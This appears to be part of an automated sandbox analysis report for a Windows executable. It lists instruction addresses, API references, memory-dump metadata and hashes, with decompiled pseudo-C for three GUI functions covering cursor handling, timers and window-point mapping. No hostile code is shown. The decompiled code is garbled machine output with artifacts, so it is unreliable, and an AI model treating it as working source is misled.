0x00459dcd
0x00459dcd
0x00000000
0x00459ae7
0x00459aec
0x00459af2
0x00459af8
0x00459b00
0x00459b0d
0x00459b15
0x00459b20
0x00459b2b
0x00459b2c
0x00459b2d
0x00459b2e
0x00459b39
0x00459b3e
0x00459b43
0x00459b4b
0x00459b4e
0x00459b50
0x00459b60
0x00459b65
0x00459b6b
0x00459b70
0x00459b72
0x00459b74
0x00459b7b
0x00459b88
0x00459b88
0x00459b7b
0x00459b52
0x00459b59
0x00459b59
0x00459b9f
0x00459bb2
0x00459bbd
0x00459bc6
0x00459bd4
0x00459be5
0x00459bf3
0x00459bfa
0x00459c02
0x00459c05
0x00459c0a
0x00459c0f
0x00459c29
0x00459c31
0x00459c51
0x00459c51
0x00459c5b
0x00459c65
0x00459c69
0x00459c69
0x00459c69
0x00459c6b
0x00459c6d
0x00459c76
0x00000000
0x00459c7c
0x00459c7c
0x00459c80
0x00000000
0x00000000
0x00459c8a
0x00459ca2
0x00459cbd
0x00459ccf
0x00459ce7
0x00459d02
0x00459d1e
0x00459d1e
0x00459d2f
0x00459d34
0x00459d3c
0x00459d45
0x00459d56
0x00459d5b
0x00459d63
0x00459d6c
0x00459d7a
0x00459d93
0x00459d99
0x00459d9e
0x00459da3
0x00459db9
0x00459da5
0x00459dab
0x00459dab
0x00459ddb
0x00459ddd
0x00459de0
0x00459de3
0x00459df3
0x00459dfb
0x00459e06
0x00459e06
0x00459c76

APIs

Part of subcall function 0044FEB8: GetActiveWindow.USER32 ref: 0044FEBB
Part of subcall function 0044FEB8: GetCurrentThreadId.KERNEL32 ref: 0044FED0
Part of subcall function 0044FEB8: 7378AC10.USER32(00000000,0044FE98), ref: 0044FED6

Part of subcall function 004598A8: GetCursor.USER32(?), ref: 004598C3
Part of subcall function 004598A8: GetIconInfo.USER32(00000000,?), ref: 004598C9

ClientToScreen.USER32(?,?), ref: 00459B88
OffsetRect.USER32(?,?,?), ref: 00459B9F
OffsetRect.USER32(?,?,?), ref: 00459CCF

Part of subcall function 00459678: SetTimer.USER32(00000000,00000000,?,0045747C), ref: 00459692

Strings

`NC, xrefs: 00459B65

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: OffsetRect$7378ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
String ID: `NC
API String ID: 1837645497-918118547
Opcode ID: b6f56a5278e326f233595b3ba09ef6aea8ef7f0135572a85e330dfade3806389
Instruction ID: f53a5582f4b0aa71572237dcaa714d8be12822c38cb9570800d0a0e6945ada50
Opcode Fuzzy Hash: b6f56a5278e326f233595b3ba09ef6aea8ef7f0135572a85e330dfade3806389
Instruction Fuzzy Hash: FDD1D275A00618CFCB00DFA8C884A9AB7F5BF49304F1581AAE905EB366DB34AD49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00443660, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 287
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00443660(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _v8;
				struct tagPOINT _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				struct tagMSG _v64;
				intOrPtr _v68;
				long _v72;
				char _v76;
				intOrPtr _t125;
				int _t126;
				int _t140;
				int _t147;
				intOrPtr* _t175;
				int _t186;
				void* _t191;
				intOrPtr* _t209;
				void* _t213;
				intOrPtr _t214;
				intOrPtr _t219;
				int _t232;
				intOrPtr _t233;
				int _t236;
				intOrPtr* _t242;
				intOrPtr _t262;
				intOrPtr _t278;
				intOrPtr _t289;
				int _t297;
				int _t300;
				int _t302;
				int _t303;
				int _t304;
				void* _t307;
				void* _t309;
				void* _t315;

				_t315 = __fp0;
				_t306 = _t307;
				_v76 = 0;
				_t242 = __edx;
				_v8 = __eax;
				_push(_t307);
				_push(0x443a38);
				_push( *[fs:eax]);
				 *[fs:eax] = _t307 + 0xffffffb8;
				_t125 =  *__edx;
				_t309 = _t125 - 0x202;
				if(_t309 > 0) {
					_t126 = _t125 - 0x203;
					__eflags = _t126;
					if(_t126 == 0) {
						E00407260( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
						_t297 = E004420EC(_v8,  &_v20,  &_v72, __eflags);
						__eflags = _t297;
						if(_t297 != 0) {
							__eflags =  *(_t297 + 4);
							if( *(_t297 + 4) != 0) {
								__eflags = _v20 - 2;
								if(_v20 == 2) {
									E0043751C();
									E004399F0( *(_t297 + 4), 0, 0, 1);
								}
							}
						}
						L47:
						if( *((short*)(_v8 + 0x32)) != 0) {
							 *((intOrPtr*)(_v8 + 0x30))();
						}
						L49:
						_pop(_t262);
						 *[fs:eax] = _t262;
						_push(0x443a3f);
						return E00404320( &_v76);
					}
					_t140 = _t126 - 0xae2d;
					__eflags = _t140;
					if(_t140 == 0) {
						 *((intOrPtr*)(_v8 + 0x30))();
						__eflags =  *(__edx + 0xc);
						if( *(__edx + 0xc) != 0) {
							goto L49;
						}
						_t300 =  *((intOrPtr*)( *_v8 + 4))();
						__eflags = _v20 - 0x12;
						if(_v20 != 0x12) {
							__eflags = _t300;
							if(_t300 == 0) {
								goto L49;
							}
							_t147 = _v20 - 2;
							__eflags = _t147;
							if(_t147 == 0) {
								L46:
								E0043865C(_t300,  &_v36);
								 *((intOrPtr*)( *_v8))();
								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
								E00438CBC(_t300,  &_v76);
								E00404374( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								goto L49;
							}
							__eflags = _t147 != 0x12;
							if(_t147 != 0x12) {
								goto L49;
							}
							goto L46;
						}
						E00404320( *((intOrPtr*)(__edx + 8)) + 0x38);
						goto L49;
					} else {
						__eflags = _t140 == 0x12;
						if(_t140 == 0x12) {
							_t175 =  *((intOrPtr*)(__edx + 8));
							__eflags =  *_t175 - 0xb00b;
							if( *_t175 == 0xb00b) {
								E00443544(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)));
							}
						}
						goto L47;
					}
				}
				if(_t309 == 0) {
					__eflags =  *(_v8 + 0x60);
					if(__eflags != 0) {
						E00443090(_v8, __eflags);
					} else {
						E00407260( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
						_t302 = E004420EC(_v8,  &_v20,  &_v16, __eflags);
						__eflags = _t302;
						if(_t302 != 0) {
							__eflags = _v20 - 0x14;
							if(_v20 == 0x14) {
								_t295 =  *((intOrPtr*)(_t302 + 4));
								_t278 =  *0x44e7cc; // 0x44e818
								_t186 = E00403740( *((intOrPtr*)(_t302 + 4)), _t278);
								__eflags = _t186;
								if(_t186 == 0) {
									E00438BDC(_t295, 0);
								} else {
									E00455680(_t295,  &_v20);
								}
							}
						}
					}
					goto L47;
				}
				_t191 = _t125 - 0x20;
				if(_t191 == 0) {
					GetCursorPos( &_v16);
					E00438800( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
					_v16.x = _v72;
					_v16.y = _v68;
					__eflags =  *((short*)(_t242 + 8)) - 1;
					if( *((short*)(_t242 + 8)) != 1) {
						goto L47;
					}
					__eflags = E0043F370( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
					if(__eflags != 0) {
						goto L47;
					}
					__eflags = E0043DF04( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
					if(__eflags <= 0) {
						goto L47;
					}
					_t303 = E004420EC(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t303;
					if(_t303 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(_v20 != 0x12) {
						goto L47;
					}
					_t209 =  *0x48e838; // 0x48fc00
					SetCursor(E00456D18( *_t209,  *((short*)(0x4719f4 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
					 *((intOrPtr*)(_t242 + 0xc)) = 1;
					goto L49;
				}
				_t213 = _t191 - 0x1e0;
				if(_t213 == 0) {
					_t214 = _v8;
					__eflags =  *(_t214 + 0x60);
					if( *(_t214 + 0x60) != 0) {
						E00443144(_v8);
						E00407260( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
						_t219 = _v8;
						 *(_t219 + 0x50) = _v72;
						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
						E004435CC(_t306);
						E00443144(_v8);
					}
					goto L47;
				}
				if(_t213 == 1) {
					E00407260( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
					_t256 =  &_v20;
					_t304 = E004420EC(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t304;
					if(_t304 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(__eflags != 0) {
						__eflags = _v20 - 2;
						if(_v20 != 2) {
							goto L47;
						}
						_t232 = PeekMessageA( &_v64, E0043F370( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
						__eflags = _t232;
						if(_t232 == 0) {
							_t289 =  *0x434e14; // 0x434e60
							_t236 = E00403740( *((intOrPtr*)(_t304 + 4)), _t289);
							__eflags = _t236;
							if(_t236 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc0))();
							}
						}
						_t233 =  *((intOrPtr*)(_t304 + 4));
						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
						if( *((char*)(_t233 + 0x9b)) == 1) {
							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
							if( *((char*)(_t233 + 0x5d)) == 1) {
								E00439364(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
							}
						}
						goto L49;
					}
					E00443030(_v8,  &_v16, _t304, __eflags);
				} else {
				}
			}

0x00443660
0x00443661
0x0044366b
0x0044366e
0x00443670
0x00443675
0x00443676
0x0044367b
0x0044367e
0x00443681
0x00443683
0x00443688
0x004436ac
0x004436ac
0x004436b1
0x00443732
0x00443745
0x00443747
0x00443749
0x0044374f
0x00443753
0x00443759
0x0044375d
0x00443763
0x00443771
0x00443771
0x0044375d
0x00443753
0x00443a0d
0x00443a15
0x00443a1f
0x00443a1f
0x00443a22
0x00443a24
0x00443a27
0x00443a2a
0x00443a37
0x00443a37
0x004436b3
0x004436b3
0x004436b8
0x0044394b
0x0044394e
0x00443952
0x00000000
0x00000000
0x00443969
0x0044396b
0x0044396f
0x00443981
0x00443983
0x00000000
0x00000000
0x0044398c
0x0044398c
0x0044398f
0x0044399a
0x0044399f
0x004439ae
0x004439b8
0x004439c3
0x004439d3
0x004439e3
0x004439eb
0x004439f9
0x00443a07
0x00443a08
0x00443a09
0x00443a0a
0x00000000
0x00443a0a
0x00443991
0x00443994
0x00000000
0x00000000
0x00000000
0x00443994
0x00443977
0x00000000
0x004436be
0x004436be
0x004436c1
0x004436c7
0x004436ca
0x004436d0
0x004436df
0x004436df
0x004436d0
0x00000000
0x004436c1
0x004436b8
0x0044368a
0x0044382e
0x00443832
0x00443892
0x00443834
0x0044383a
0x0044384d
0x0044384f
0x00443851
0x00443857
0x0044385b
0x00443861
0x00443866
0x0044386c
0x00443871
0x00443873
0x00443885
0x00443875
0x00443877
0x00443877
0x00443873
0x0044385b
0x00443851
0x00000000
0x00443832
0x00443690
0x00443693
0x004438a0
0x004438b1
0x004438b9
0x004438bf
0x004438c2
0x004438c7
0x00000000
0x00000000
0x004438d8
0x004438db
0x00000000
0x00000000
0x004438ec
0x004438ee
0x00000000
0x00000000
0x00443902
0x00443904
0x00443906
0x00000000
0x00000000
0x0044390c
0x00443910
0x00000000
0x00000000
0x00443925
0x00443932
0x00443937
0x00000000
0x00443937
0x00443699
0x0044369e
0x004436e9
0x004436ec
0x004436f0
0x004436f9
0x00443704
0x00443709
0x0044370f
0x00443715
0x00443719
0x00443722
0x00443722
0x00000000
0x004436f0
0x004436a1
0x00443781
0x00443786
0x00443794
0x00443796
0x00443798
0x00000000
0x00000000
0x0044379e
0x004437a2
0x004437b6
0x004437ba
0x00000000
0x00000000
0x004437dc
0x004437e1
0x004437e3
0x004437e8
0x004437ee
0x004437f3
0x004437f5
0x004437fc
0x004437fc
0x004437f5
0x00443802
0x00443805
0x0044380c
0x00443812
0x00443816
0x00443821
0x00443821
0x00443816
0x00000000
0x0044380c
0x004437ac
0x00000000
0x004436a7

APIs

GetCursorPos.USER32(?), ref: 004438A0
SetCursor.USER32(00000000,?,00000000,00443A38), ref: 00443932

Strings

`NC, xrefs: 004437E8

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor
String ID: `NC
API String ID: 3268636600-918118547
Opcode ID: f7c74d81f964bc4f20ea5fec5752d74ed2e32656671d70a9f91e691ce9aa7558
Instruction ID: 1d7f5713cc2549e45e58fe85bb2fa03b13f2b2d90be15fa78b56c3320b109250
Opcode Fuzzy Hash: f7c74d81f964bc4f20ea5fec5752d74ed2e32656671d70a9f91e691ce9aa7558
Instruction Fuzzy Hash: 5AC18B31A00209CFEB10DF69C9859AEB7F1BF04B05F1485AAE841AB395D778EF45CB49

Uniqueness

Uniqueness Score: -1.00%

Function 004624A0, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 276
timeCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004624A0(intOrPtr* __eax, signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				signed int _v9;
				signed int _v16;
				signed int _v20;
				char _v21;
				char _v124;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t145;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr _t193;
				signed int _t197;
				signed int _t204;
				intOrPtr _t213;
				intOrPtr _t215;
				signed int _t224;
				signed int _t237;
				signed int _t240;
				void* _t248;
				void* _t252;
				signed int _t253;
				intOrPtr _t268;
				intOrPtr _t284;
				void* _t295;
				signed int _t297;
				intOrPtr _t304;

				_v9 = __ecx;
				_t253 = __edx;
				_v8 = __eax;
				_t294 = _a8;
				_v21 = 0;
				E00463354(_v8, __edx, _a8, _t295);
				_t145 = _v8;
				_t305 =  *(_t145 + 0x1c) & 0x00000010;
				if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
					L5:
					__eflags = _t253;
					if(_t253 != 0) {
						L8:
						__eflags = _t253;
						if(_t253 != 0) {
							L37:
							_push(0x46284b);
							_push( *[fs:eax]);
							 *[fs:eax] = _t304;
							E0043A2BC(_v8, _t253, _a4, _t294);
							_pop(_t268);
							 *[fs:eax] = _t268;
							return 0;
						}
						E0045FDC8(_v8,  &_v124);
						_t296 =  *_v8;
						 *((intOrPtr*)( *_v8 + 0xc8))( &_v124, _v8 + 0x268, _v8 + 0x264, _v8 + 0x260, _v8 + 0x28e);
						__eflags =  *((char*)(_v8 + 0x28e));
						if(__eflags != 0) {
							__eflags =  *((char*)(_v8 + 0x28e)) - 3;
							if(__eflags == 0) {
								_t296 = 0xffc8;
								_t237 = E004037B0(_v8, __eflags);
								__eflags = _t237;
								if(_t237 != 0) {
									_t240 = E004386C0(_v8) -  *(_v8 + 0x264);
									__eflags = _t240;
									 *(_v8 + 0x264) = _t240;
								}
							}
							return E004607BC(_v8, _t253,  &_v124, _t294, _t296);
						}
						_t259 = _a4;
						E0045FD6C(_v8, _a4, _t294, __eflags,  &_v20,  &_v124);
						_t169 = _v8;
						_t297 = _v20;
						__eflags =  *((intOrPtr*)(_t169 + 0x238)) - _t297;
						if( *((intOrPtr*)(_t169 + 0x238)) > _t297) {
							L25:
							_t171 = _v8;
							__eflags =  *(_t171 + 0x249) & 0x00000001;
							if(( *(_t171 + 0x249) & 0x00000001) == 0) {
								L31:
								_t172 = _v8;
								__eflags =  *(_t172 + 0x249) & 0x00000002;
								if(( *(_t172 + 0x249) & 0x00000002) != 0) {
									__eflags = _v16;
									if(_v16 >= 0) {
										_t173 = _v8;
										__eflags =  *((intOrPtr*)(_t173 + 0x23c)) - _v16;
										if( *((intOrPtr*)(_t173 + 0x23c)) > _v16) {
											__eflags =  *((intOrPtr*)(_v8 + 0x238)) - _v20;
											if(__eflags <= 0) {
												_t177 = _v20;
												 *((intOrPtr*)(_v8 + 0x26c)) = _t177;
												 *((intOrPtr*)(_v8 + 0x270)) = _t177;
												E00412A88(_t294,  &_v132, _a4);
												_push( &_v132);
												_t184 = E004037B0(_v8, __eflags);
												__eflags = _t184;
												if(_t184 != 0) {
													 *((char*)(_v8 + 0x28e)) = 5;
													 *((intOrPtr*)( *_v8 + 0x88))();
													E004608FC(_v8, _t253, _t294, 0xffa3);
													_v21 = 1;
													SetTimer(E0043F370(_v8), 1, 0x3c, 0);
												}
											}
										}
									}
								}
								goto L37;
							}
							__eflags = _v20;
							if(_v20 < 0) {
								goto L31;
							}
							_t193 = _v8;
							__eflags =  *((intOrPtr*)(_t193 + 0x238)) - _v20;
							if( *((intOrPtr*)(_t193 + 0x238)) <= _v20) {
								goto L31;
							}
							__eflags =  *((intOrPtr*)(_v8 + 0x23c)) - _v16;
							if(__eflags > 0) {
								goto L31;
							}
							_t197 = _v16;
							 *((intOrPtr*)(_v8 + 0x26c)) = _t197;
							 *((intOrPtr*)(_v8 + 0x270)) = _t197;
							E00412A88(_t294,  &_v132, _a4);
							_push( &_v132);
							_t204 = E004037B0(_v8, __eflags);
							__eflags = _t204;
							if(_t204 != 0) {
								 *((char*)(_v8 + 0x28e)) = 4;
								 *((intOrPtr*)( *_v8 + 0x88))();
								E004608FC(_v8, _t253, _t294, 0xffa2);
								_v21 = 1;
								SetTimer(E0043F370(_v8), 1, 0x3c, 0);
							}
							goto L37;
						}
						_t213 = _v8;
						__eflags =  *((intOrPtr*)(_t213 + 0x23c)) - _v16;
						if( *((intOrPtr*)(_t213 + 0x23c)) > _v16) {
							goto L25;
						}
						_t215 = _v8;
						__eflags =  *(_t215 + 0x249) & 0x00000004;
						if(( *(_t215 + 0x249) & 0x00000004) == 0) {
							 *((char*)(_v8 + 0x28e)) = 1;
							SetTimer(E0043F370(_v8), 1, 0x3c, 0);
							__eflags = _v9 & 0x00000001;
							if((_v9 & 0x00000001) == 0) {
								E00461434(_v8, _t253, _v16, _t297, _t294, _t297, 1, 1);
							} else {
								E004613AC(_v8, _t259,  &_v20, _t294);
							}
							goto L37;
						}
						_t284 = _v8;
						_t224 = _v20;
						__eflags =  *((intOrPtr*)(_t284 + 0x228)) - _t224;
						if( *((intOrPtr*)(_t284 + 0x228)) != _t224) {
							L20:
							E00461434(_v8, _t253, _v16, _t224, _t294, _t297, 1, 1);
							E00463430(_v8, _t294, _t297);
							L21:
							E004037B0(_v8, __eflags);
							goto L37;
						}
						__eflags =  *((intOrPtr*)(_v8 + 0x22c)) - _v16;
						if(__eflags != 0) {
							goto L20;
						}
						E0045ED14(_v8);
						goto L21;
					}
					__eflags = _v9 & 0x00000040;
					if(__eflags == 0) {
						goto L8;
					} else {
						E004037B0(_v8, __eflags);
						goto L37;
					}
				}
				if(E004037B0(_v8, _t305) != 0) {
					L3:
					 *((intOrPtr*)( *_v8 + 0xc0))();
					_t248 = E0045EC84(_v8, _t307);
					_t308 = _t248;
					if(_t248 == 0) {
						return E00438EF4(_v8, 0, _t308);
					}
					goto L5;
				}
				_t252 = E004500B0(_v8);
				_t307 = _t252;
				if(_t252 != 0) {
					goto L5;
				}
				goto L3;
			}

0x004624a9
0x004624ac
0x004624ae
0x004624b1
0x004624b4
0x004624bb
0x004624c0
0x004624c3
0x004624c7
0x0046250b
0x0046250b
0x0046250d
0x00462526
0x00462526
0x00462528
0x00462821
0x00462824
0x00462829
0x0046282c
0x0046283c
0x00462843
0x00462846
0x00000000
0x00462846
0x00462534
0x00462569
0x0046256b
0x00462574
0x0046257b
0x00462580
0x00462587
0x0046258c
0x00462590
0x00462595
0x00462597
0x004625a4
0x004625a4
0x004625ad
0x004625ad
0x00462597
0x00000000
0x004625b9
0x004625cb
0x004625d3
0x004625d8
0x004625e1
0x004625e4
0x004625e6
0x004626a6
0x004626a6
0x004626a9
0x004626b0
0x0046276a
0x0046276a
0x0046276d
0x00462774
0x0046277a
0x0046277e
0x00462784
0x0046278d
0x00462790
0x0046279f
0x004627a2
0x004627a7
0x004627aa
0x004627b3
0x004627c1
0x004627c9
0x004627e3
0x004627e8
0x004627ea
0x004627ef
0x004627fb
0x00462804
0x00462809
0x0046281c
0x0046281c
0x004627ea
0x004627a2
0x00462790
0x0046277e
0x00000000
0x00462774
0x004626b6
0x004626ba
0x00000000
0x00000000
0x004626c0
0x004626c9
0x004626cc
0x00000000
0x00000000
0x004626db
0x004626de
0x00000000
0x00000000
0x004626e7
0x004626ea
0x004626f3
0x00462701
0x00462709
0x00462723
0x00462728
0x0046272a
0x00462733
0x0046273f
0x00462748
0x0046274d
0x00462760
0x00462760
0x00000000
0x0046272a
0x004625ec
0x004625f5
0x004625f8
0x00000000
0x00000000
0x004625fe
0x00462601
0x00462608
0x0046265f
0x00462675
0x0046267a
0x0046267e
0x0046269c
0x00462680
0x00462686
0x00462686
0x00000000
0x0046267e
0x0046260a
0x00462613
0x00462616
0x00462618
0x00462632
0x0046263e
0x00462646
0x0046264b
0x00462652
0x00000000
0x00462652
0x00462623
0x00462626
0x00000000
0x00000000
0x0046262b
0x00000000
0x0046262b
0x0046250f
0x00462513
0x00000000
0x00462515
0x0046251c
0x00000000
0x0046251c
0x00462513
0x004624d7
0x004624e5
0x004624ea
0x004624f3
0x004624f8
0x004624fa
0x00000000
0x00462501
0x00000000
0x004624fa
0x004624dc
0x004624e1
0x004624e3
0x00000000
0x00000000
0x00000000

APIs

SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 00462675
SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 00462760
SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0046281C

Strings

@, xrefs: 0046250F

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Timer
String ID: @
API String ID: 2870079774-2766056989
Opcode ID: e19c6d066cb0ebf89f24c24055dd5b0b2d63a3d2a4710d8bab3af7d36b94b696
Instruction ID: b04af2dd0f035db5d223fb8d5fb95ff9779478ab5d06ee46ebc96045597ce5c2
Opcode Fuzzy Hash: e19c6d066cb0ebf89f24c24055dd5b0b2d63a3d2a4710d8bab3af7d36b94b696
Instruction Fuzzy Hash: 76C12D34A00608EFDB10DB99CA85BDEB7F5BF04304F2441A6E804A7392D779AF45DB45

Uniqueness

Uniqueness Score: -1.00%

Function 004399F0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E004399F0(void* __eax, intOrPtr __ecx, intOrPtr __edx, char _a4) {
				intOrPtr _v8;
				char _v9;
				intOrPtr _v16;
				struct tagPOINT _v32;
				intOrPtr _v36;
				long _v40;
				char _v56;
				void* __edi;
				struct HWND__* _t57;
				void* _t63;
				char _t84;
				struct HWND__* _t108;
				void* _t110;
				intOrPtr _t134;
				intOrPtr _t137;
				void* _t141;
				struct HWND__* _t143;
				struct HWND__* _t147;
				void* _t152;
				void* _t154;
				intOrPtr _t155;

				_t152 = _t154;
				_t155 = _t154 + 0xffffffcc;
				_v8 = __ecx;
				_t137 = __edx;
				_t110 = __eax;
				if(__edx == 0 || __edx == 0xffffffff) {
					_t57 =  *(_t110 + 0xa0);
					if(_t57 == 0 ||  *((char*)(_t57 + 0x1a7)) == 0 ||  *((intOrPtr*)(_t57 + 0x17c)) == 0) {
						E00412A88( *((intOrPtr*)(_t110 + 0x40)),  &_v40,  *((intOrPtr*)(_t110 + 0x44)));
						_v32.x = _v40;
						_v32.y = _v36;
						_t143 =  *(_t110 + 0x30);
						__eflags = _t143;
						if(_t143 != 0) {
							E004387D4(_t143,  &_v40,  &_v32);
							_v32.x = _v40;
							_v32.y = _v36;
						}
					} else {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x17c)))) + 0x14))();
						MapWindowPoints(E0043F370( *(_t110 + 0xa0)), 0,  &_v32, 2);
					}
					_t63 = E00438C4C(_t110);
					E00412AD8(_v32.x, E00438C60(_t110), _v32.y,  &_v56, _t63);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v9 = E00439BD0(_t110,  &_v32);
					goto L20;
				} else {
					E00439ED8(__eax);
					__eflags =  *(_t110 + 0xa0);
					if(__eflags == 0) {
						L12:
						_t84 = 1;
					} else {
						_t108 = E004037B0( *(_t110 + 0xa0), __eflags);
						__eflags = _t108;
						if(_t108 != 0) {
							goto L12;
						} else {
							_t84 = 0;
						}
					}
					_v9 = _t84;
					__eflags = _v9;
					if(_v9 == 0) {
						L20:
						return _v9;
					} else {
						_v16 = E004363E8(1, _t137);
						_push(_t152);
						_push(0x439bbb);
						_push( *[fs:edx]);
						 *[fs:edx] = _t155;
						_t87 =  *(_t110 + 0xa0);
						__eflags =  *(_t110 + 0xa0);
						if( *(_t110 + 0xa0) == 0) {
							_t147 = 0;
							__eflags = 0;
						} else {
							_t147 = E0043F370(_t87);
						}
						E0043865C(_t110,  &_v32);
						__eflags = _t147;
						if(__eflags != 0) {
							MapWindowPoints(_t147, 0,  &_v32, 2);
						}
						 *((intOrPtr*)(_v16 + 4)) = _t137;
						 *((char*)(_v16 + 0x54)) = _a4;
						 *((intOrPtr*)(_v16 + 0x58)) = _v8;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t141 = _t137;
						MapWindowPoints(0, E0043F370(_t141),  &_v32, 1);
						_push(_v32.y);
						E004037B0(_t141, __eflags);
						__eflags = 0;
						_pop(_t134);
						 *[fs:eax] = _t134;
						_push(0x439bc2);
						return E004035B4(_v16);
					}
				}
			}

0x004399f1
0x004399f3
0x004399f9
0x004399fc
0x004399fe
0x00439a02
0x00439a0d
0x00439a15
0x00439a5d
0x00439a65
0x00439a6b
0x00439a6e
0x00439a71
0x00439a73
0x00439a7d
0x00439a85
0x00439a8b
0x00439a8b
0x00439a29
0x00439a36
0x00439a4d
0x00439a4d
0x00439a90
0x00439aa9
0x00439ab4
0x00439ab5
0x00439ab6
0x00439ab7
0x00439ac2
0x00000000
0x00439aca
0x00439acc
0x00439ad1
0x00439ad8
0x00439af5
0x00439af5
0x00439ada
0x00439ae8
0x00439aed
0x00439aef
0x00000000
0x00439af1
0x00439af1
0x00439af1
0x00439aef
0x00439af7
0x00439afa
0x00439afe
0x00439bc2
0x00439bcb
0x00439b04
0x00439b12
0x00439b17
0x00439b18
0x00439b1d
0x00439b20
0x00439b23
0x00439b29
0x00439b2b
0x00439b36
0x00439b36
0x00439b2d
0x00439b32
0x00439b32
0x00439b3d
0x00439b42
0x00439b44
0x00439b4f
0x00439b4f
0x00439b57
0x00439b60
0x00439b69
0x00439b76
0x00439b77
0x00439b78
0x00439b79
0x00439b7a
0x00439b8b
0x00439b93
0x00439ba0
0x00439ba5
0x00439ba7
0x00439baa
0x00439bad
0x00439bba
0x00439bba
0x00439afe

APIs

MapWindowPoints.USER32 ref: 00439A4D
MapWindowPoints.USER32 ref: 00439B4F
MapWindowPoints.USER32 ref: 00439B8B

Strings

<<C, xrefs: 00439B08

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
